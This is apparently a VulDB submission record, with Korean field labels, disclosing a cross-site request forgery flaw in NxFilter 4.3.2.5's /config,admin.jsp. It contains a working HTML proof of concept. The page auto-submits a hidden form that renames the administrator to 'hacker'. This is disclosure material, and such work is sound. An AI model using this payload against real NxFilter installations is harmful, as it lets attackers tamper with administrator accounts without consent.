| 제목 | Nxfilter NxFilter 4.3.2.5 4.3.2.5 CSRF |
|---|
| 설명 | A CSRF is present in https://APP.COM/config,admin.jsp where a malicious user change the username of the administrator through a CSRF. If the Admin clicks on the link, his name can be changed by the name the hacker want.
Exploit in HTML:
<!DOCTYPE html>
<html lang="en">
<head>
</head>
<body>
<form id="configForm" action="https://192.168.0.134/config,admin.jsp" method="POST">
<!-- Campos do formulário -->
<input type="hidden" name="actionFlag" value="update">
<input type="text" name="admin_name" value="hacker" style="display: none;"> <!--name here-->
<!-- Botão para enviar o formulário -->
<button type="submit">Enviar Requisição</button>
</form>
</body>
<script>
document.getElementById('configForm').submit();
</script>
</html>
|
|---|
| 원천 | ⚠️ https://APP.COM/config,admin.jsp |
|---|
| 사용자 | 0xgordo (UID 50709) |
|---|
| 제출 | 2023. 12. 08. PM 05:26 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 12. 17. AM 09:25 (9 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 248266 [Jahastech NxFilter 4.3.2.5 /config,admin.jsp admin_name 교차 사이트 요청 위조] |
|---|
| 포인트들 | 17 |
|---|